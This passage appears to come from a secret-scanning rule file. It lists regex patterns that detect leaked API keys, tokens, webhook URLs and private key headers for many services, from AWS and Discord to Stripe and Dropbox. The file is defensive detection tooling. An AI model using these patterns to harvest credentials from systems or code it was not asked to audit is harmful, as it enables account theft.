name: autoklose + regex: + - (?:autoklose).{0,40}\b([a-zA-Z0-9-]{32})\b + part: body + - type: regex + name: autopilot + regex: + - (?:autopilot).{0,40}\b([0-9a-f]{32})\b + part: body + - type: regex + name: avazapersonalaccesstoken + regex: + - (?:avaza).{0,40}\b([0-9]+-[0-9a-f]{40})\b + part: body + - type: regex + name: aviationstack + regex: + - (?:aviationstack).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: aws_1 + regex: + - \b((?:AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16})\b + part: body + - type: regex + name: axonaut + regex: + - (?:axonaut).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: aylien_1 + regex: + - (?:aylien).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: aylien_2 + regex: + - (?:aylien).{0,40}\b([a-z0-9]{8})\b + part: body + - type: regex + name: ayrshare + regex: + - >- + (?:ayrshare).{0,40}\b([A-Z]{7}-[A-Z0-9]{7}-[A-Z0-9]{7}-[A-Z0-9]{7})\b + part: body + - type: regex + name: bannerbear + regex: + - (?:bannerbear).{0,40}\b([0-9a-zA-Z]{22}tt)\b + part: body + - type: regex + name: baremetrics + regex: + - (?:baremetrics).{0,40}\b([a-zA-Z0-9_]{25})\b + part: body + - type: regex + name: baseapiio + regex: + - >- + (?:baseapi|base-api).{0,40}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b + part: body + - type: regex + name: beamer + regex: + - (?:beamer).{0,40}\b([a-zA-Z0-9_+/]{45}=) + part: body + - type: regex + name: beebole + regex: + - (?:beebole).{0,40}\b([0-9a-z]{40})\b + part: body + - type: regex + name: besttime + regex: + - (?:besttime).{0,40}\b([0-9A-Za-z_]{36})\b + part: body + - type: regex + name: billomat_1 + regex: + - (?:billomat).{0,40}\b([0-9a-z]{1,})\b + part: body + - type: regex + name: billomat_2 + regex: + - (?:billomat).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: bitbar + regex: + - (?:bitbar).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: bitcoinaverage + regex: + - (?:bitcoinaverage).{0,40}\b([a-zA-Z0-9]{43})\b + part: body + - type: regex + name: bitfinex + regex: + - (?:bitfinex).{0,40}\b([A-Za-z0-9_-]{43})\b + part: body + - type: regex + name: bitly_secret_key + regex: + - R_[0-9a-f]{32} + part: body + - type: regex + name: bitlyaccesstoken + regex: + - (?:bitly).{0,40}\b([a-zA-Z-0-9]{40})\b + part: body + - type: regex + name: bitmex_1 + regex: + - (?:bitmex).{0,40}([ \r\n]{1}[0-9a-zA-Z\-\_]{24}[ \r\n]{1}) + part: body + - type: regex + name: bitmex_2 + regex: + - (?:bitmex).{0,40}([ \r\n]{1}[0-9a-zA-Z\-\_]{48}[ \r\n]{1}) + part: body + - type: regex + name: blablabus + regex: + - (?:blablabus).{0,40}\b([0-9A-Za-z]{22})\b + part: body + - type: regex + name: blazemeter + regex: + - >- + (?:blazemeter|runscope).{0,40}\b([0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b + part: body + - type: regex + name: blitapp + regex: + - (?:blitapp).{0,40}\b([a-zA-Z0-9_-]{39})\b + part: body + - type: regex + name: bombbomb + regex: + - (?:bombbomb).{0,40}\b([a-zA-Z0-9-._]{704})\b + part: body + - type: regex + name: boostnote + regex: + - (?:boostnote).{0,40}\b([0-9a-f]{64})\b + part: body + - type: regex + name: borgbase + regex: + - (?:borgbase).{0,40}\b([a-zA-Z0-9/_.-]{148,152})\b + part: body + - type: regex + name: braintree_api_key + regex: + - access_token$production$[0-9a-z]{16}$[0-9a-f]{32} + part: body + - type: regex + name: brandfetch + regex: + - (?:brandfetch).{0,40}\b([0-9A-Za-z]{40})\b + part: body + - type: regex + name: browshot + regex: + - (?:browshot).{0,40}\b([a-zA-Z-0-9]{28})\b + part: body + - type: regex + name: buddyns + regex: + - (?:buddyns).{0,40}\b([0-9a-z]{40})\b + part: body + - type: regex + name: bugherd + regex: + - (?:bugherd).{0,40}\b([0-9a-z]{22})\b + part: body + - type: regex + name: bugsnag + regex: + - >- + (?:bugsnag).{0,40}\b([0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b + part: body + - type: regex + name: buildkite + regex: + - (?:buildkite).{0,40}\b([a-z0-9]{40})\b + part: body + - type: regex + name: bulbul + regex: + - (?:bulbul).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: buttercms + regex: + - (?:buttercms).{0,40}\b([a-z0-9]{40})\b + part: body + - type: regex + name: caflou + regex: + - (?:caflou).{0,40}\b([a-bA-Z0-9\S]{155})\b + part: body + - type: regex + name: calendarific + regex: + - (?:calendarific).{0,40}\b([a-z0-9]{40})\b + part: body + - type: regex + name: calendlyapikey + regex: + - >- + (?:calendly).{0,40}\b([a-zA-Z-0-9]{20}.[a-zA-Z-0-9]{171}.[a-zA-Z-0-9_]{43})\b + part: body + - type: regex + name: calorieninja + regex: + - (?:calorieninja).{0,40}\b([0-9A-Za-z]{40})\b + part: body + - type: regex + name: campayn + regex: + - (?:campayn).{0,40}\b([a-z0-9]{64})\b + part: body + - type: regex + name: cannyio + regex: + - >- + (?:canny).{0,40}\b([a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[0-9]{4}-[a-z0-9]{12})\b + part: body + - type: regex + name: capsulecrm + regex: + - (?:capsulecrm).{0,40}\b([a-zA-Z0-9-._+=]{64})\b + part: body + - type: regex + name: captaindata_1 + regex: + - >- + (?:captaindata).{0,40}\b([0-9a-f]{8}\-[0-9a-f]{4}\-[0-9a-f]{4}\-[0-9a-f]{4}\-[0-9a-f]{12})\b + part: body + - type: regex + name: captaindata_2 + regex: + - (?:captaindata).{0,40}\b([0-9a-f]{64})\b + part: body + - type: regex + name: carboninterface + regex: + - (?:carboninterface).{0,40}\b([a-zA-Z0-9]{21})\b + part: body + - type: regex + name: cashboard_1 + regex: + - >- + (?:cashboard).{0,40}\b([0-9A-Z]{3}-[0-9A-Z]{3}-[0-9A-Z]{3}-[0-9A-Z]{3})\b + part: body + - type: regex + name: cashboard_2 + regex: + - (?:cashboard).{0,40}\b([0-9a-z]{1,})\b + part: body + - type: regex + name: caspio_1 + regex: + - (?:caspio).{0,40}\b([a-z0-9]{8})\b + part: body + - type: regex + name: caspio_2 + regex: + - (?:caspio).{0,40}\b([a-z0-9]{50})\b + part: body + - type: regex + name: censys_1 + regex: + - (?:censys).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: censys_2 + regex: + - (?:censys).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: centralstationcrm + regex: + - (?:centralstation).{0,40}\b([a-z0-9]{30})\b + part: body + - type: regex + name: cexio_1 + regex: + - (?:cexio|cex.io).{0,40}\b([a-z]{2}[0-9]{9})\b + part: body + - type: regex + name: cexio_2 + regex: + - (?:cexio|cex.io).{0,40}\b([0-9A-Za-z]{24,27})\b + part: body + - type: regex + name: chatbot + regex: + - (?:chatbot).{0,40}\b([a-zA-Z0-9_]{32})\b + part: body + - type: regex + name: chatfule + regex: + - (?:chatfuel).{0,40}\b([a-zA-Z0-9]{128})\b + part: body + - type: regex + name: checio + regex: + - (?:checio).{0,40}\b(pk_[a-z0-9]{45})\b + part: body + - type: regex + name: checklyhq + regex: + - (?:checklyhq).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: checkout_1 + regex: + - >- + (?:checkout).{0,40}\b((sk_|sk_test_)[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})\b + part: body + - type: regex + name: checkout_2 + regex: + - (?:checkout).{0,40}\b(cus_[0-9a-zA-Z]{26})\b + part: body + - type: regex + name: checkvist_1 + regex: + - (?:checkvist).{0,40}\b([\w\.-]+@[\w-]+\.[\w\.-]{2,5})\b + part: body + - type: regex + name: checkvist_2 + regex: + - (?:checkvist).{0,40}\b([0-9a-zA-Z]{14})\b + part: body + - type: regex + name: cicero + regex: + - (?:cicero).{0,40}\b([0-9a-z]{40})\b + part: body + - type: regex + name: clearbit + regex: + - (?:clearbit).{0,40}\b([0-9a-z_]{35})\b + part: body + - type: regex + name: clickhelp_1 + regex: + - \b([0-9A-Za-z]{3,20}.try.clickhelp.co)\b + part: body + - type: regex + name: clickhelp_2 + regex: + - (?:clickhelp).{0,40}\b([0-9A-Za-z]{24})\b + part: body + - type: regex + name: clicksendsms_2 + regex: + - >- + (?:sms).{0,40}\b([a-zA-Z0-9]{3,20}@[a-zA-Z0-9]{2,12}.[a-zA-Z0-9]{2,5})\b + part: body + - type: regex + name: clickuppersonaltoken + regex: + - (?:clickup).{0,40}\b(pk_[0-9]{8}_[0-9A-Z]{32})\b + part: body + - type: regex + name: cliengo + regex: + - >- + (?:cliengo).{0,40}\b([0-9a-f]{8}\-[0-9a-f]{4}\-[0-9a-f]{4}\-[0-9a-f]{4}\-[0-9a-f]{12})\b + part: body + - type: regex + name: clinchpad + regex: + - (?:clinchpad).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: clockify + regex: + - (?:clockify).{0,40}\b([a-zA-Z0-9]{48})\b + part: body + - type: regex + name: clockworksms_1 + regex: + - (?:clockwork|textanywhere).{0,40}\b([0-9a-zA-Z]{24})\b + part: body + - type: regex + name: clockworksms_2 + regex: + - (?:clockwork|textanywhere).{0,40}\b([0-9]{5})\b + part: body + - type: regex + name: closecrm + regex: + - \b(api_[a-z0-9A-Z.]{45})\b + part: body + - type: regex + name: cloudelements_1 + regex: + - (?:cloudelements).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: cloudelements_2 + regex: + - (?:cloudelements).{0,40}\b([a-zA-Z0-9]{43})\b + part: body + - type: regex + name: cloudflarecakey + regex: + - (?:cloudflare).{0,40}\b(v[A-Za-z0-9._-]{173,})\b + part: body + - type: regex + name: cloudimage + regex: + - (?:cloudimage).{0,40}\b([a-z0-9_]{30})\b + part: body + - type: regex + name: cloudinary_credentials + regex: + - cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+ + part: body + - type: regex + name: cloudmersive + regex: + - (?:cloudmersive).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: cloudplan + regex: + - (?:cloudplan).{0,40}\b([A-Z0-9-]{32})\b + part: body + - type: regex + name: cloverly + regex: + - (?:cloverly).{0,40}\b([a-z0-9:_]{28})\b + part: body + - type: regex + name: cloze_1 + regex: + - (?:cloze).{0,40}\b([0-9a-f]{32})\b + part: body + - type: regex + name: cloze_2 + regex: + - (?:cloze).{0,40}\b([\w\.-]+@[\w-]+\.[\w\.-]{2,5})\b + part: body + - type: regex + name: clustdoc + regex: + - (?:clustdoc).{0,40}\b([0-9a-zA-Z]{60})\b + part: body + - type: regex + name: codacy + regex: + - (?:codacy).{0,40}\b([0-9A-Za-z]{20})\b + part: body + - type: regex + name: coinapi + regex: + - (?:coinapi).{0,40}\b([A-Z0-9-]{36})\b + part: body + - type: regex + name: coinbase + regex: + - (?:coinbase).{0,40}\b([a-zA-Z-0-9]{64})\b + part: body + - type: regex + name: coinlayer + regex: + - (?:coinlayer).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: coinlib + regex: + - (?:coinlib).{0,40}\b([a-z0-9]{16})\b + part: body + - type: regex + name: column + regex: + - (?:column).{0,40}\b((?:test|live)_[a-zA-Z0-9]{27})\b + part: body + - type: regex + name: commercejs + regex: + - (?:commercejs).{0,40}\b([a-z0-9_]{48})\b + part: body + - type: regex + name: commodities + regex: + - (?:commodities).{0,40}\b([a-zA-Z0-9]{60})\b + part: body + - type: regex + name: companyhub_1 + regex: + - (?:companyhub).{0,40}\b([0-9a-zA-Z]{20})\b + part: body + - type: regex + name: companyhub_2 + regex: + - (?:companyhub).{0,40}\b([a-zA-Z0-9$%^=-]{4,32})\b + part: body + - type: regex + name: confluent_1 + regex: + - (?:confluent).{0,40}\b([a-zA-Z-0-9]{16})\b + part: body + - type: regex + name: confluent_2 + regex: + - (?:confluent).{0,40}\b([a-zA-Z-0-9]{64})\b + part: body + - type: regex + name: convertkit + regex: + - (?:convertkit).{0,40}\b([a-z0-9A-Z_]{22})\b + part: body + - type: regex + name: convier + regex: + - (?:convier).{0,40}\b([0-9]{2}\|[a-zA-Z0-9]{40})\b + part: body + - type: regex + name: copper_2 + regex: + - (?:copper).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: countrylayer + regex: + - (?:countrylayer).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: courier + regex: + - (?:courier).{0,40}\b(pk\_[a-zA-Z0-9]{1,}\_[a-zA-Z0-9]{28})\b + part: body + - type: regex + name: coveralls + regex: + - (?:coveralls).{0,40}\b([a-zA-Z0-9-]{37})\b + part: body + - type: regex + name: crowdin + regex: + - (?:crowdin).{0,40}\b([0-9A-Za-z]{80})\b + part: body + - type: regex + name: cryptocompare + regex: + - (?:cryptocompare).{0,40}\b([a-z-0-9]{64})\b + part: body + - type: regex + name: currencycloud_1 + regex: + - (?:currencycloud).{0,40}\b([0-9a-z]{64})\b + part: body + - type: regex + name: currencyfreaks + regex: + - (?:currencyfreaks).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: currencylayer + regex: + - (?:currencylayer).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: currencyscoop + regex: + - (?:currencyscoop).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: currentsapi + regex: + - (?:currentsapi).{0,40}\b([a-zA-Z0-9\S]{48})\b + part: body + - type: regex + name: customerguru_1 + regex: + - (?:guru).{0,40}\b([a-z0-9A-Z]{50})\b + part: body + - type: regex + name: customerguru_2 + regex: + - (?:guru).{0,40}\b([a-z0-9A-Z]{30})\b + part: body + - type: regex + name: d7network + regex: + - (?:d7network).{0,40}\b([a-zA-Z0-9\W\S]{23}\=) + part: body + - type: regex + name: dailyco + regex: + - (?:daily).{0,40}\b([0-9a-f]{64})\b + part: body + - type: regex + name: dandelion + regex: + - (?:dandelion).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: databricks + regex: + - dapi[a-f0-9]{32}\b + part: body + - type: regex + name: datafire + regex: + - (?:datafire).{0,40}\b([a-z0-9\S]{175,190})\b + part: body + - type: regex + name: datagov + regex: + - (?:data.gov).{0,40}\b([a-zA-Z0-9]{40})\b + part: body + - type: regex + name: deepai + regex: + - (?:deepai).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: deepgram + regex: + - (?:deepgram).{0,40}\b([0-9a-z]{40})\b + part: body + - type: regex + name: delighted + regex: + - (?:delighted).{0,40}\b([a-z0-9A-Z]{32})\b + part: body + - type: regex + name: deputy_1 + regex: + - \b([0-9a-z]{1,}.as.deputy.com)\b + part: body + - type: regex + name: deputy_2 + regex: + - (?:deputy).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: detectlanguage + regex: + - (?:detectlanguage).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: dfuse + regex: + - \b(web\_[0-9a-z]{32})\b + part: body + - type: regex + name: diffbot + regex: + - (?:diffbot).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: digitaloceantoken + regex: + - (?:digitalocean).{0,40}\b([A-Za-z0-9_-]{64})\b + part: body + - type: regex + name: discord_webhook + regex: + - https://discordapp\.com/api/webhooks/[0-9]+/[A-Za-z0-9\-]+ + part: body + - type: regex + name: discordbottoken_1 + regex: + - >- + (?:discord).{0,40}\b([A-Za-z0-9_-]{24}\.[A-Za-z0-9_-]{6}\.[A-Za-z0-9_-]{27})\b + part: body + - type: regex + name: discordbottoken_2 + regex: + - (?:discord).{0,40}\b([0-9]{17})\b + part: body + - type: regex + name: discordwebhook + regex: + - (https:\/\/discord.com\/api\/webhooks\/[0-9]{18}\/[0-9a-zA-Z-]{68}) + part: body + - type: regex + name: ditto + regex: + - >- + (?:ditto).{0,40}\b([a-z0-9]{8}\-[a-z0-9]{4}\-[a-z0-9]{4}\-[a-z0-9]{4}\-[a-z0-9]{12}\.[a-z0-9]{40})\b + part: body + - type: regex + name: dnscheck_1 + regex: + - (?:dnscheck).{0,40}\b([a-z0-9A-Z-]{36})\b + part: body + - type: regex + name: dnscheck_2 + regex: + - (?:dnscheck).{0,40}\b([a-z0-9A-Z]{32})\b + part: body + - type: regex + name: documo + regex: + - \b(ey[a-zA-Z0-9]{34}.ey[a-zA-Z0-9]{154}.[a-zA-Z0-9_-]{43})\b + part: body + - type: regex + name: doppler + regex: + - \b(dp\.pt\.[a-zA-Z0-9]{43})\b + part: body + - type: regex + name: dotmailer_1 + regex: + - (?:dotmailer).{0,40}\b(apiuser-[a-z0-9]{12}@apiconnector.com)\b + part: body + - type: regex + name: dotmailer_2 + regex: + - (?:dotmailer).{0,40}\b([a-zA-Z0-9\S]{8,24})\b + part: body + - type: regex + name: dovico + regex: + - (?:dovico).{0,40}\b([0-9a-z]{32}\.[0-9a-z]{1,}\b) + part: body + - type: regex + name: dronahq + regex: + - (?:dronahq).{0,40}\b([a-z0-9]{50})\b + part: body + - type: regex + name: droneci + regex: + - (?:droneci).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: dropbox + regex: + - \b(sl\.[A-Za-z0-9\-\_]{130,140})\b + part: body + - type: regex + name: dwolla + regex: + - (?:dwolla).{0,40}\b([a-zA-Z-0-9]{50})\b + part: body + - type: regex + name: dynalist + regex: + - (?:dynalist).{0,40}\b([a-zA-Z0-9-_]{128})\b + part: body + - type: regex + name: dynatrace_token + regex: + - dt0[a-zA-Z]{1}[0-9]{2}\.[A-Z0-9]{24}\.[A-Z0-9]{64} + part: body + - type: regex + name: dyspatch + regex: + - (?:dyspatch).{0,40}\b([A-Z0-9]{52})\b + part: body + - type: regex + name: ec + regex: + - '-----BEGIN EC PRIVATE KEY-----' + part: body + - type: regex + name: eagleeyenetworks_1 + regex: + - >- + (?:eagleeyenetworks).{0,40}\b([a-zA-Z0-9]{3,20}@[a-zA-Z0-9]{2,12}.[a-zA-Z0-9]{2,5})\b + part: body + - type: regex + name: eagleeyenetworks_2 + regex: + - (?:eagleeyenetworks).{0,40}\b([a-zA-Z0-9]{15})\b + part: body + - type: regex + name: easyinsight_1 + regex: + - (?:easyinsight|easy-insight).{0,40}\b([a-zA-Z0-9]{20})\b + part: body + - type: regex + name: easyinsight_2 + regex: + - (?:easyinsight|easy-insight).{0,40}\b([0-9Aa-zA-Z]{20})\b + part: body + - type: regex + name: edamam_1 + regex: + - (?:edamam).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: edamam_2 + regex: + - (?:edamam).{0,40}\b([0-9a-z]{8})\b + part: body + - type: regex + name: edenai + regex: + - >- + (?:edenai).{0,40}\b([a-zA-Z0-9]{36}.[a-zA-Z0-9]{92}.[a-zA-Z0-9_]{43})\b + part: body + - type: regex + name: eightxeight_2 + regex: + - (?:8x8).{0,40}\b([a-zA-Z0-9]{43})\b + part: body + - type: regex + name: elasticemail + regex: + - (?:elastic).{0,40}\b([A-Za-z0-9_-]{96})\b + part: body + - type: regex + name: enablex_1 + regex: + - (?:enablex).{0,40}\b([a-zA-Z0-9]{36})\b + part: body + - type: regex + name: enablex_2 + regex: + - (?:enablex).{0,40}\b([a-z0-9]{24})\b + part: body + - type: regex + name: enigma + regex: + - (?:enigma).{0,40}\b([a-zA-Z0-9]{40})\b + part: body + - type: regex + name: ethplorer + regex: + - (?:ethplorer).{0,40}\b([a-z0-9A-Z-]{22})\b + part: body + - type: regex + name: everhour + regex: + - >- + (?:everhour).{0,40}\b([0-9Aa-f]{4}-[0-9a-f]{4}-[0-9a-f]{6}-[0-9a-f]{6}-[0-9a-f]{8})\b + part: body + - type: regex + name: exchangerateapi + regex: + - (?:exchangerate).{0,40}\b([a-z0-9]{24})\b + part: body + - type: regex + name: exchangeratesapi + regex: + - (?:exchangerates).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: facebook_access_token + regex: + - EAACEdEose0cBA[0-9A-Za-z]+ + part: body + - type: regex + name: faceplusplus + regex: + - (?:faceplusplus).{0,40}\b([0-9a-zA-Z_-]{32})\b + part: body + - type: regex + name: fakejson + regex: + - (?:fakejson).{0,40}\b([a-zA-Z0-9]{22})\b + part: body + - type: regex + name: fastforex + regex: + - (?:fastforex).{0,40}\b([a-z0-9-]{28})\b + part: body + - type: regex + name: fastlypersonaltoken + regex: + - (?:fastly).{0,40}\b([A-Za-z0-9_-]{32})\b + part: body + - type: regex + name: feedier + regex: + - (?:feedier).{0,40}\b([a-z0-9A-Z]{32})\b + part: body + - type: regex + name: fetchrss + regex: + - (?:fetchrss).{0,40}\b([0-9A-Za-z.]{40})\b + part: body + - type: regex + name: figmapersonalaccesstoken + regex: + - >- + (?:figma).{0,40}\b([0-9]{6}-[0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b + part: body + - type: regex + name: fileio + regex: + - (?:fileio).{0,40}\b([A-Z0-9.-]{39})\b + part: body + - type: regex + name: finage + regex: + - \b(API_KEY[0-9A-Z]{32})\b + part: body + - type: regex + name: financialmodelingprep + regex: + - (?:financialmodelingprep).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: findl + regex: + - >- + (?:findl).{0,40}\b([a-z0-9]{8}\-[a-z0-9]{4}\-[a-z0-9]{4}\-[a-z0-9]{4}\-[a-z0-9]{12})\b + part: body + - type: regex + name: finnhub + regex: + - (?:finnhub).{0,40}\b([0-9a-z]{20})\b + part: body + - type: regex + name: fixerio + regex: + - (?:fixer).{0,40}\b([A-Za-z0-9]{32})\b + part: body + - type: regex + name: flatio + regex: + - (?:flat).{0,40}\b([0-9a-z]{128})\b + part: body + - type: regex + name: fleetbase + regex: + - \b(flb_live_[0-9a-zA-Z]{20})\b + part: body + - type: regex + name: flickr + regex: + - (?:flickr).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: flightapi + regex: + - (?:flightapi).{0,40}\b([a-z0-9]{24})\b + part: body + - type: regex + name: flightstats_1 + regex: + - (?:flightstats).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: flightstats_2 + regex: + - (?:flightstats).{0,40}\b([0-9a-z]{8})\b + part: body + - type: regex + name: flowflu_2 + regex: + - (?:flowflu).{0,40}\b([a-zA-Z0-9]{51})\b + part: body + - type: regex + name: flutterwave + regex: + - \b(FLWSECK-[0-9a-z]{32}-X)\b + part: body + - type: regex + name: fmfw_1 + regex: + - (?:fmfw).{0,40}\b([a-zA-Z0-9-]{32})\b + part: body + - type: regex + name: fmfw_2 + regex: + - (?:fmfw).{0,40}\b([a-zA-Z0-9_-]{32})\b + part: body + - type: regex + name: formbucket + regex: + - >- + (?:formbucket).{0,40}\b([0-9A-Za-z]{1,}.[0-9A-Za-z]{1,}\.[0-9A-Z-a-z\-_]{1,}) + part: body + - type: regex + name: formio + regex: + - >- + (?:formio).{0,40}\b(eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9\.[0-9A-Za-z]{310}\.[0-9A-Z-a-z\-_]{43}[ + \r\n]{1}) + part: body + - type: regex + name: foursquare + regex: + - (?:foursquare).{0,40}\b([0-9A-Z]{48})\b + part: body + - type: regex + name: frameio + regex: + - \b(fio-u-[0-9a-zA-Z_-]{64})\b + part: body + - type: regex + name: freshbooks_1 + regex: + - (?:freshbooks).{0,40}\b([0-9a-z]{64})\b + part: body + - type: regex + name: freshbooks_2 + regex: + - (?:freshbooks).{0,40}\b(https://www.[0-9A-Za-z_-]{1,}.com)\b + part: body + - type: regex + name: freshdesk_1 + regex: + - (?:freshdesk).{0,40}\b([0-9A-Za-z]{20})\b + part: body + - type: regex + name: freshdesk_2 + regex: + - \b([0-9a-z-]{1,}.freshdesk.com)\b + part: body + - type: regex + name: front + regex: + - (?:front).{0,40}\b([0-9a-zA-Z]{36}.[0-9a-zA-Z\.\-\_]{188,244})\b + part: body + - type: regex + name: fulcrum + regex: + - (?:fulcrum).{0,40}\b([a-z0-9]{80})\b + part: body + - type: regex + name: fullstory + regex: + - (?:fullstory).{0,40}\b([a-zA-Z-0-9/+]{88})\b + part: body + - type: regex + name: fusebill + regex: + - (?:fusebill).{0,40}\b([a-zA-Z0-9]{88})\b + part: body + - type: regex + name: fxmarket + regex: + - (?:fxmarket).{0,40}\b([0-9Aa-zA-Z-_=]{20})\b + part: body + - type: regex + name: gcp + regex: + - \{[^{]+auth_provider_x509_cert_url[^}]+\} + part: body + - type: regex + name: geckoboard + regex: + - (?:geckoboard).{0,40}\b([a-zA-Z0-9]{44})\b + part: body + - type: regex + name: generic_1376 + regex: + - jdbc:mysql(=| =|:| :) + part: body + - type: regex + name: generic_1700 + regex: + - BEGIN OPENSSH PRIVATE KEY + part: body + - type: regex + name: generic_1701 + regex: + - BEGIN PRIVATE KEY + part: body + - type: regex + name: generic_1702 + regex: + - BEGIN RSA PRIVATE KEY + part: body + - type: regex + name: generic_1703 + regex: + - BEGIN DSA PRIVATE KEY + part: body + - type: regex + name: generic_1704 + regex: + - BEGIN EC PRIVATE KEY + part: body + - type: regex + name: generic_1705 + regex: + - BEGIN PGP PRIVATE KEY BLOCK + part: body + - type: regex + name: generic_1710 + regex: + - algolia_api_key + part: body + - type: regex + name: generic_1711 + regex: + - asana_access_token + part: body + - type: regex + name: generic_1713 + regex: + - azure_tenant + part: body + - type: regex + name: generic_1714 + regex: + - bitly_access_token + part: body + - type: regex + name: generic_1716 + regex: + - browserstack_access_key + part: body + - type: regex + name: generic_1717 + regex: + - buildkite_access_token + part: body + - type: regex + name: generic_1718 + regex: + - comcast_access_token + part: body + - type: regex + name: generic_1719 + regex: + - datadog_api_key + part: body + - type: regex + name: generic_1720 + regex: + - deviantart_secret + part: body + - type: regex + name: generic_1721 + regex: + - deviantart_access_token + part: body + - type: regex + name: generic_1722 + regex: + - dropbox_api_token + part: body + - type: regex + name: generic_1723 + regex: + - facebook_appsecret + part: body + - type: regex + name: generic_1724 + regex: + - facebook_access_token + part: body + - type: regex + name: generic_1725 + regex: + - firebase_custom_token + part: body + - type: regex + name: generic_1726 + regex: + - firebase_id_token + part: body + - type: regex + name: generic_1727 + regex: + - github_client + part: body + - type: regex + name: generic_1728 + regex: + - github_ssh_key + part: body + - type: regex + name: generic_1730 + regex: + - gitlab_private_token + part: body + - type: regex + name: generic_1733 + regex: + - heroku_api_key + part: body + - type: regex + name: generic_1734 + regex: + - instagram_access_token + part: body + - type: regex + name: generic_1735 + regex: + - mailchimp_api_key + part: body + - type: regex + name: generic_1736 + regex: + - mailgun_api_key + part: body + - type: regex + name: generic_1739 + regex: + - pagerduty_api_token + part: body + - type: regex + name: generic_1740 + regex: + - paypal_key_sb + part: body + - type: regex + name: generic_1741 + regex: + - paypal_key_live + part: body + - type: regex + name: generic_1742 + regex: + - paypal_token_sb + part: body + - type: regex + name: generic_1743 + regex: + - paypal_token_live + part: body + - type: regex + name: generic_1744 + regex: + - pendo_integration_key + part: body + - type: regex + name: generic_1745 + regex: + - salesforce_access_token + part: body + - type: regex + name: generic_1746 + regex: + - saucelabs_ukey + part: body + - type: regex + name: generic_1747 + regex: + - sendgrid_api_key + part: body + - type: regex + name: generic_1748 + regex: + - slack_api_token + part: body + - type: regex + name: generic_1751 + regex: + - square_auth_token + part: body + - type: regex + name: generic_1752 + regex: + - travisci_api_token + part: body + - type: regex + name: generic_1754 + regex: + - twitter_api_secret + part: body + - type: regex + name: generic_1755 + regex: + - twitter_bearer_token + part: body + - type: regex + name: generic_1756 + regex: + - spotify_access_token + part: body + - type: regex + name: generic_1757 + regex: + - stripe_key_live + part: body + - type: regex + name: generic_1758 + regex: + - wakatime_api_key + part: body + - type: regex + name: generic_1759 + regex: + - wompi_auth_bearer_sb + part: body + - type: regex + name: generic_1760 + regex: + - wompi_auth_bearer_live + part: body + - type: regex + name: generic_1761 + regex: + - wpengine_api_key + part: body + - type: regex + name: generic_1763 + regex: + - zendesk_access_token + part: body + - type: regex + name: generic_1764 + regex: + - ssh-rsa + part: body + - type: regex + name: gengo + regex: + - >- + (?:gengo).{0,40}([ ]{0,1}[0-9a-zA-Z\[\]\-\(\)\{\}|_^@$=~]{64}[ + \r\n]{1}) + part: body + - type: regex + name: geoapify + regex: + - (?:geoapify).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: geocode + regex: + - (?:geocode).{0,40}\b([a-z0-9]{28})\b + part: body + - type: regex + name: geocodify + regex: + - (?:geocodify).{0,40}\b([0-9a-z]{40})\b + part: body + - type: regex + name: geocodio_2 + regex: + - (?:geocod).{0,40}\b([a-z0-9]{39})\b + part: body + - type: regex + name: geoipifi + regex: + - (?:ipifi).{0,40}\b([a-z0-9A-Z_]{32})\b + part: body + - type: regex + name: getemail + regex: + - (?:getemail).{0,40}\b([a-zA-Z0-9-]{20})\b + part: body + - type: regex + name: getemails_1 + regex: + - (?:getemails).{0,40}\b([a-z0-9-]{26})\b + part: body + - type: regex + name: getemails_2 + regex: + - (?:getemails).{0,40}\b([a-z0-9-]{18})\b + part: body + - type: regex + name: getgeoapi + regex: + - (?:getgeoapi).{0,40}\b([0-9a-z]{40})\b + part: body + - type: regex + name: getgist + regex: + - (?:getgist).{0,40}\b([a-z0-9A-Z+=]{68}) + part: body + - type: regex + name: getsandbox_1 + regex: + - (?:getsandbox).{0,40}\b([a-z0-9-]{40})\b + part: body + - type: regex + name: getsandbox_2 + regex: + - 